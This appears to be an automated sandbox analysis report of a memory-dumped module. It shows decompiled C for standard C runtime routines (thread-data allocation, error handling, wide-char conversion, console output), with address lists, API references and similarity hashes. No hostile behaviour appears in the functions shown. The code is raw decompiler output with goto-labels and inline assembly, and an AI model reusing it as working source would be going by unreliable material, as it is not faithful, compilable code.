								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6EDA6B43( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6EDA6B43(_t283);
						goto L31;
					}
				} else {
					_t219 = E6EDA6AD3(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6EDA6A16();
					L31:
					return _t297;
				}
				L81:
			}

0x6eda6d3a
0x6eda6d3d
0x6eda6d40
0x6eda6d41
0x6eda6d43
0x6eda6d59
0x6eda6d5d
0x6eda6d60
0x6eda6d62
0x6eda6d64
0x6eda6d66
0x6eda6d68
0x6eda6d6b
0x6eda6d6e
0x6eda6d71
0x6eda6d73
0x6eda6dd6
0x6eda6dd8
0x6eda6ddb
0x6eda6ddd
0x6eda6de1
0x6eda6dea
0x6eda6deb
0x6eda6dee
0x6eda6df0
0x6eda6df3
0x6eda6df7
0x6eda6df7
0x6eda6df9
0x6eda6dfb
0x6eda6dfd
0x6eda6dff
0x6eda6dff
0x6eda6e01
0x6eda6e04
0x6eda6e07
0x6eda6e07
0x6eda6e09
0x6eda6e0a
0x6eda6e0a
0x6eda6e15
0x6eda6e17
0x6eda6e1a
0x6eda6e1b
0x6eda6e1e
0x6eda6e1e
0x6eda6e22
0x6eda6e25
0x6eda6e28
0x6eda6e28
0x6eda6e28
0x6eda6e35
0x6eda6e37
0x6eda6e3a
0x6eda6e3c
0x6eda6e54
0x6eda6e57
0x6eda6e5a
0x6eda6e5c
0x6eda6e5f
0x6eda6e61
0x6eda6e64
0x6eda6e67
0x6eda6ec4
0x6eda6ec7
0x6eda6eca
0x6eda6ecc
0x00000000
0x6eda6e69
0x6eda6e6b
0x6eda6e6b
0x6eda6e6d
0x6eda6e70
0x6eda6e70
0x6eda6e72
0x6eda6e74
0x6eda6e7a
0x6eda6e7d
0x6eda6e7d
0x6eda6e7f
0x6eda6e80
0x6eda6e80
0x6eda6e87
0x6eda6e8a
0x6eda6e8e
0x6eda6e9b
0x6eda6ea0
0x6eda6ea3
0x6eda6ea5
0x6eda6f1b
0x6eda6f1c
0x6eda6f1d
0x6eda6f1e
0x6eda6f1f
0x6eda6f20
0x6eda6f25
0x6eda6f29
0x6eda6f2b
0x6eda6f2c
0x6eda6f2f
0x6eda6f2f
0x6eda6f32
0x6eda6f32
0x6eda6f34
0x6eda6f35
0x6eda6f35
0x6eda6f39
0x6eda6f3a
0x6eda6f41
0x6eda6f44
0x6eda6f47
0x6eda6f49
0x6eda6f53
0x6eda6f54
0x6eda6f55
0x6eda6f58
0x6eda6f62
0x6eda6f66
0x6eda6f68
0x6eda6f7c
0x6eda6f7c
0x6eda6f7f
0x6eda6f89
0x6eda6f8e
0x6eda6f91
0x6eda6f93
0x00000000
0x6eda6f95
0x6eda6f95
0x6eda6f9a
0x6eda6fa1
0x6eda6fa4
0x6eda6fa6
0x6eda6fb7
0x6eda6fb9
0x6eda6fbb
0x6eda6fbb
0x6eda6fbb
0x6eda6fa8
0x6eda6fa9
0x6eda6fae
0x6eda6fb1
0x6eda6fc0
0x6eda6fc6
0x00000000
0x6eda6fc9
0x6eda6f6a
0x6eda6f6a
0x6eda6f70
0x6eda6f75
0x6eda6f78
0x6eda6f7a
0x6eda6fcc
0x6eda6fce
0x6eda6fcf
0x6eda6fd0
0x6eda6fd1
0x6eda6fd2
0x6eda6fd3
0x6eda6fd8
0x6eda6fdb
0x6eda6fdc
0x6eda6fde
0x6eda6fe4
0x6eda6feb
0x6eda6fee
0x6eda6ff1
0x6eda6ff4
0x6eda6ff5
0x6eda6ff6
0x6eda6ff9
0x6eda6fff
0x6eda7001
0x6eda7003
0x6eda7003
0x6eda7005
0x6eda7007
0x00000000
0x00000000
0x6eda7009
0x6eda700b
0x6eda700d
0x6eda700f
0x6eda701a
0x6eda701c
0x6eda701e
0x00000000
0x00000000
0x6eda701e
0x6eda700f
0x00000000
0x6eda700b
0x6eda7020
0x6eda7020
0x6eda7026
0x6eda7028
0x6eda702e
0x6eda7030
0x6eda7052
0x6eda7052
0x6eda7054
0x6eda7056
0x6eda7062
0x6eda7062
0x6eda7058
0x6eda7058
0x6eda705a
0x00000000
0x6eda705c
0x6eda705c
0x6eda705e
0x6eda7060
0x00000000
0x00000000
0x6eda7060
0x6eda705a
0x6eda706a
0x6eda7072
0x6eda7078
0x6eda7079
0x6eda707b
0x6eda7083
0x6eda7089
0x6eda708f
0x6eda7095
0x6eda70a9
0x6eda70ae
0x6eda70b9
0x6eda70c9
0x6eda70cf
0x6eda70d1
0x6eda70d4
0x6eda70f7
0x6eda70f7
0x6eda70fc
0x6eda7102
0x6eda7102
0x6eda7108
0x6eda710e
0x6eda7114
0x6eda711a
0x6eda7120
0x6eda7141
0x6eda7146
0x6eda714b
0x6eda714f
0x6eda7155
0x6eda7158
0x6eda716b
0x6eda716b
0x6eda7171
0x6eda7177
0x6eda7178
0x6eda7179
0x6eda717e
0x6eda7181
0x6eda7187
0x6eda7189
0x6eda71e7
0x6eda71ed
0x6eda71f5
0x6eda71fa
0x6eda7200
0x6eda7201
0x00000000
0x00000000
0x00000000
0x6eda715a
0x6eda715a
0x6eda715d
0x6eda715f
0x00000000
0x6eda7161
0x6eda7161
0x6eda7164
0x00000000
0x6eda7166
0x6eda7166
0x6eda7169
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda7169
0x6eda7164
0x6eda715f
0x6eda7203
0x6eda7204
0x00000000
0x6eda718b
0x6eda718b
0x6eda7191
0x6eda7199
0x6eda719e
0x6eda71ad
0x6eda71ad
0x6eda71b5
0x6eda71bb
0x6eda71c1
0x6eda71c8
0x6eda71cb
0x6eda71cd
0x6eda71dd
0x6eda71e2
0x00000000
0x6eda70d6
0x6eda70d6
0x6eda70dc
0x6eda70dd
0x6eda70de
0x6eda70df
0x6eda70e7
0x6eda70e7
0x6eda720a
0x6eda720a
0x6eda7211
0x6eda7212
0x6eda721a
0x6eda721f
0x6eda7220
0x6eda7032
0x6eda7032
0x6eda7035
0x6eda7037
0x6eda704c
0x00000000
0x6eda7039
0x6eda7039
0x6eda703c
0x6eda703d
0x6eda703e
0x6eda703f
0x6eda7044
0x6eda7037
0x6eda7225
0x6eda7226
0x6eda7228
0x6eda7231
0x00000000
0x00000000
0x00000000
0x6eda6f7a
0x6eda6f4b
0x6eda6f4d
0x6eda6f4e
0x6eda6f52
0x6eda6f52
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda6ea7
0x6eda6ea7
0x6eda6ead
0x6eda6eb0
0x6eda6eb3
0x6eda6eb6
0x6eda6eb9
0x6eda6ebc
0x6eda6ebf
0x6eda6ebf
0x00000000
0x6eda6e70
0x6eda6e3e
0x6eda6e3e
0x6eda6e41
0x6eda6ece
0x6eda6ecf
0x6eda6ed4
0x00000000
0x6eda6ed4
0x6eda6d75
0x6eda6d75
0x6eda6d78
0x6eda6d80
0x6eda6d83
0x6eda6d8a
0x6eda6d8c
0x6eda6d8e
0x6eda6da9
0x6eda6daa
0x6eda6dab
0x6eda6dac
0x6eda6db1
0x6eda6db4
0x6eda6db7
0x6eda6d90
0x6eda6d90
0x6eda6d93
0x6eda6d94
0x6eda6d95
0x6eda6d96
0x6eda6d97
0x6eda6d9c
0x6eda6d9e
0x6eda6da1
0x6eda6da1
0x6eda6db9
0x6eda6dbb
0x00000000
0x00000000
0x6eda6dc4
0x6eda6dc7
0x6eda6dca
0x6eda6dcc
0x6eda6dce
0x00000000
0x6eda6dd0
0x6eda6dd0
0x6eda6dd3
0x00000000
0x6eda6dd3
0x00000000
0x6eda6dce
0x6eda6e49
0x6eda6ed5
0x6eda6ed8
0x6eda6edc
0x6eda6ee5
0x6eda6ee8
0x6eda6eec
0x6eda6eec
0x6eda6eee
0x6eda6ef1
0x6eda6ef3
0x6eda6ef5
0x6eda6ef7
0x6eda6efc
0x6eda6efd
0x6eda6f01
0x6eda6f01
0x6eda6f05
0x6eda6f08
0x6eda6f08
0x6eda6f0c
0x00000000
0x6eda6f13
0x6eda6d45
0x6eda6d45
0x6eda6d4c
0x6eda6d4d
0x6eda6d4f
0x6eda6f14
0x6eda6f1a
0x6eda6f1a
0x00000000

APIs

_free.LIBCMT ref: 6EDA6ECF

Strings

*?, xrefs: 6EDA6D78

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction ID: e1070638529c187796340fa20bd838e3221bf682d6b0747690c8614af50a946a
Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction Fuzzy Hash: E3610875E10219DF9B14CFEDC8805EDFBB9EF48314B14856AE925E7344E731AB418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6C47, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA6C47(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6EDA7E45(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6EDA7E45(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6EDA6A9D(GetLastError());
									_t19 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6EDA728D(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6EDA6A9D(GetLastError());
						return  *((intOrPtr*)(E6EDA6AD3(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6EDA728D(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6EDA7273(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6eda6c4e
0x6eda6c53
0x6eda6c71
0x6eda6c73
0x6eda6c76
0x6eda6ca3
0x6eda6cab
0x6eda6cad
0x6eda6cc6
0x6eda6cc9
0x6eda6ccc
0x6eda6cda
0x6eda6ce9
0x6eda6cf1
0x6eda6cf3
0x6eda6d0c
0x6eda6d0f
0x6eda6d0f
0x6eda6cf5
0x6eda6cfc
0x6eda6d07
0x6eda6d07
0x6eda6d11
0x00000000
0x6eda6d11
0x6eda6cd1
0x6eda6cd6
0x6eda6cd8
0x00000000
0x00000000
0x00000000
0x6eda6cd8
0x6eda6cb6
0x00000000
0x6eda6cc1
0x6eda6c78
0x6eda6c7b
0x6eda6c7e
0x6eda6c91
0x6eda6c94
0x6eda6c67
0x6eda6c67
0x00000000
0x6eda6c6a
0x6eda6c84
0x6eda6c89
0x6eda6c8b
0x6eda6d15
0x6eda6d15
0x00000000
0x6eda6c8b
0x6eda6c55
0x6eda6c5a
0x6eda6c5f
0x6eda6c61
0x6eda6c64
0x00000000

APIs

Part of subcall function 6EDA7273: _free.LIBCMT ref: 6EDA7281

Part of subcall function 6EDA7E45: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6EDA9E27,?,00000000,00000000), ref: 6EDA7EE7

GetLastError.KERNEL32 ref: 6EDA6CAF
__dosmaperr.LIBCMT ref: 6EDA6CB6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EDA6CF5
__dosmaperr.LIBCMT ref: 6EDA6CFC

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dda431e8a7a8ea1c58e9daa232c37f68659e9a1df2175a6f0be5c58d92ce7235
Instruction ID: e80b2436ebaf3034afb7f49617da40680e3dd696cddaf54532931a7e1fd7d5ac
Opcode Fuzzy Hash: dda431e8a7a8ea1c58e9daa232c37f68659e9a1df2175a6f0be5c58d92ce7235
Instruction Fuzzy Hash: C621F472624205FF9B509FEDCC8095F7BADEF013A87108928FA7597184D772EE4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6543, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6EDA6543(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6edc3050; // 0x4
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EDA84C0(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6EDA6AE6(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t51);
							if(__eflags != 0) {
								E6EDA6341(_t51, 0x6edc424c);
								E6EDA6B43(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6EDA84C0(__eflags,  *0x6edc3050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6EDA84C0(0,  *0x6edc3050, 0);
							_push(0);
							L9:
							E6EDA6B43();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6EDA8481(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6edc3050; // 0x4
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6EDA6048(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6edc3050; // 0x4
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6EDA84C0(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6EDA6AE6(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t60);
								if(__eflags != 0) {
									E6EDA6341(_t60, 0x6edc424c);
									E6EDA6B43(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6EDA84C0(__eflags,  *0x6edc3050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6EDA84C0(__eflags,  *0x6edc3050, _t20);
								_push(_t60);
								L25:
								E6EDA6B43();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6EDA8481(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6edc3050; // 0x4
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6EDA6048(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6edc3050; // 0x4
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6EDA84C0(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6EDA6AE6(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t54);
											if(__eflags != 0) {
												E6EDA6341(_t54, 0x6edc424c);
												E6EDA6B43(0);
												goto L45;
											} else {
												_t40 = 0;
												E6EDA84C0(__eflags,  *0x6edc3050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6EDA84C0(0,  *0x6edc3050, 0);
											_push(0);
											L41:
											E6EDA6B43();
											goto L36;
										}
									}
								} else {
									_t54 = E6EDA8481(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6edc3050; // 0x4
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6eda6543
0x6eda6543
0x6eda654e
0x6eda6550
0x6eda6555
0x6eda6558
0x6eda6576
0x6eda6579
0x6eda657e
0x6eda6580
0x00000000
0x6eda6582
0x6eda658e
0x6eda6591
0x6eda6592
0x6eda6594
0x6eda65b9
0x6eda65bb
0x6eda65d4
0x6eda65db
0x6eda65e0
0x00000000
0x6eda65bd
0x6eda65bd
0x6eda65c6
0x6eda65cb
0x00000000
0x6eda65cb
0x6eda6596
0x6eda6596
0x6eda6596
0x6eda659f
0x6eda65a4
0x6eda65a5
0x6eda65a5
0x6eda65aa
0x00000000
0x6eda65aa
0x6eda6594
0x6eda655a
0x6eda6560
0x6eda6564
0x6eda6571
0x00000000
0x6eda6566
0x6eda6569
0x6eda65e3
0x6eda65e3
0x6eda656b
0x6eda656b
0x6eda656b
0x6eda656d
0x6eda656d
0x6eda656d
0x6eda6569
0x6eda6564
0x6eda65e6
0x6eda65ee
0x6eda65f0
0x6eda65f2
0x6eda65fa
0x6eda65ff
0x6eda6600
0x6eda6605
0x6eda6606
0x6eda6609
0x6eda6623
0x6eda6626
0x6eda662b
0x6eda662d
0x00000000
0x6eda662f
0x6eda663b
0x6eda663e
0x6eda663f
0x6eda6641
0x6eda6664
0x6eda6666
0x6eda667d
0x6eda6684
0x6eda6689
0x00000000
0x6eda6668
0x6eda666f
0x6eda6674
0x00000000
0x6eda6674
0x6eda6643
0x6eda664a
0x6eda664f
0x6eda6650
0x6eda6650
0x6eda6655
0x00000000
0x6eda6655
0x6eda6641
0x6eda660b
0x6eda6611
0x6eda6613
0x6eda6615
0x6eda661e
0x00000000
0x6eda6617
0x6eda6617
0x6eda661a
0x6eda6694
0x6eda6694
0x6eda6699
0x6eda669c
0x6eda669d
0x6eda669e
0x6eda66a5
0x6eda66a7
0x6eda66ac
0x6eda66af
0x6eda66cd
0x6eda66d0
0x6eda66d5
0x6eda66d7
0x00000000
0x6eda66d9
0x6eda66e5
0x6eda66e9
0x6eda66eb
0x6eda6710
0x6eda6712
0x6eda672b
0x6eda6732
0x00000000
0x6eda6714
0x6eda6714
0x6eda671d
0x6eda6722
0x00000000
0x6eda6722
0x6eda66ed
0x6eda66ed
0x6eda66ed
0x6eda66f6
0x6eda66fb
0x6eda66fc
0x6eda66fc
0x00000000
0x6eda6701
0x6eda66eb
0x6eda66b1
0x6eda66b7
0x6eda66b9
0x6eda66bb
0x6eda66c8
0x00000000
0x6eda66bd
0x6eda66bd
0x6eda66c0
0x6eda673a
0x6eda673a
0x6eda66c2
0x6eda66c2
0x6eda66c2
0x6eda66c2
0x6eda66c4
0x6eda66c4
0x6eda66c4
0x6eda66c0
0x6eda66bb
0x6eda673d
0x6eda6745
0x6eda6747
0x6eda6747
0x6eda674e
0x6eda661c
0x6eda668c
0x6eda668c
0x6eda668e
0x00000000
0x6eda6690
0x6eda6693
0x6eda6693
0x6eda668e
0x6eda661a
0x6eda6615
0x6eda65f4
0x6eda65f9
0x6eda65f9

APIs

GetLastError.KERNEL32(?,?,?,6EDAA825,00000000,00000001,6EDA8C35,?,6EDAACE2,00000001,?,?,?,6EDA8BCE,?,00000000), ref: 6EDA6548
_free.LIBCMT ref: 6EDA65A5
_free.LIBCMT ref: 6EDA65DB
SetLastError.KERNEL32(00000000,00000004,000000FF,?,6EDAACE2,00000001,?,?,?,6EDA8BCE,?,00000000,00000000,6EDC1660,0000002C,6EDA8C35), ref: 6EDA65E6

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c7344172154d13eedcd3accff513780b4fc9972dcadc6459604e6715c6d89492
Instruction ID: 4aefb18991a33917542a5b30e04222c10c654ecabff9dcbd3f23774b89cd6a76
Opcode Fuzzy Hash: c7344172154d13eedcd3accff513780b4fc9972dcadc6459604e6715c6d89492
Instruction Fuzzy Hash: 1211A776624601EEAA416BFDCC8CE9F365EDBC26A87140E24F735821C4EF61CB054174

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA669A, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA669A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6edc3050; // 0x4
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EDA84C0(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6EDA6AE6(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t18);
							if(__eflags != 0) {
								E6EDA6341(_t18, 0x6edc424c);
								E6EDA6B43(0);
								goto L13;
							} else {
								_t13 = 0;
								E6EDA84C0(__eflags,  *0x6edc3050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6EDA84C0(0,  *0x6edc3050, 0);
							_push(0);
							L9:
							E6EDA6B43();
							goto L4;
						}
					}
				} else {
					_t18 = E6EDA8481(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6edc3050; // 0x4
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6eda66a5
0x6eda66a7
0x6eda66ac
0x6eda66af
0x6eda66cd
0x6eda66d0
0x6eda66d5
0x6eda66d7
0x00000000
0x6eda66d9
0x6eda66e5
0x6eda66e9
0x6eda66eb
0x6eda6710
0x6eda6712
0x6eda672b
0x6eda6732
0x00000000
0x6eda6714
0x6eda6714
0x6eda671d
0x6eda6722
0x00000000
0x6eda6722
0x6eda66ed
0x6eda66ed
0x6eda66ed
0x6eda66f6
0x6eda66fb
0x6eda66fc
0x6eda66fc
0x00000000
0x6eda6701
0x6eda66eb
0x6eda66b1
0x6eda66b7
0x6eda66bb
0x6eda66c8
0x00000000
0x6eda66bd
0x6eda66c0
0x6eda673a
0x6eda673a
0x6eda66c2
0x6eda66c2
0x6eda66c2
0x6eda66c4
0x6eda66c4
0x6eda66c4
0x6eda66c0
0x6eda66bb
0x6eda673d
0x6eda6745
0x6eda674e

APIs

GetLastError.KERNEL32(?,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA669F
_free.LIBCMT ref: 6EDA66FC
_free.LIBCMT ref: 6EDA6732
SetLastError.KERNEL32(00000000,00000004,000000FF,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA673D

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6852511af82af24b33c445b2d7fac4afaf75c1f9f1ac43088244faa567b3921e
Instruction ID: 833263f50fc2e4828cacc74a63f02488369f5261f5cd6a78bca39d7cad5483e2
Opcode Fuzzy Hash: 6852511af82af24b33c445b2d7fac4afaf75c1f9f1ac43088244faa567b3921e
Instruction Fuzzy Hash: 5511C672634A01EEA7411BFDCC8CEAF365E9BC27B87280668F735831D0DE61CA065174

Uniqueness

Uniqueness Score: -1.00%

Function 6EDABA26, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDABA26(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6edc3850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6EDABA0F();
					E6EDAB9D1();
					_t13 = WriteConsoleW( *0x6edc3850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6edaba43
0x6edaba47
0x6edaba54
0x6edaba59
0x6edaba74
0x6edaba74
0x6edaba7a

APIs

WriteConsoleW.KERNEL32(?,?,6EDA8C35,00000000,?,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001), ref: 6EDABA3D
GetLastError.KERNEL32(?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000,00000001,?,6EDAAD06,6EDA8BCE), ref: 6EDABA49

Part of subcall function 6EDABA0F: CloseHandle.KERNEL32(FFFFFFFE,6EDABA59,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000,00000001), ref: 6EDABA1F

___initconout.LIBCMT ref: 6EDABA59

Part of subcall function 6EDAB9D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EDABA00,6EDAB472,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000), ref: 6EDAB9E4

WriteConsoleW.KERNEL32(?,?,6EDA8C35,00000000,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000), ref: 6EDABA6E

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

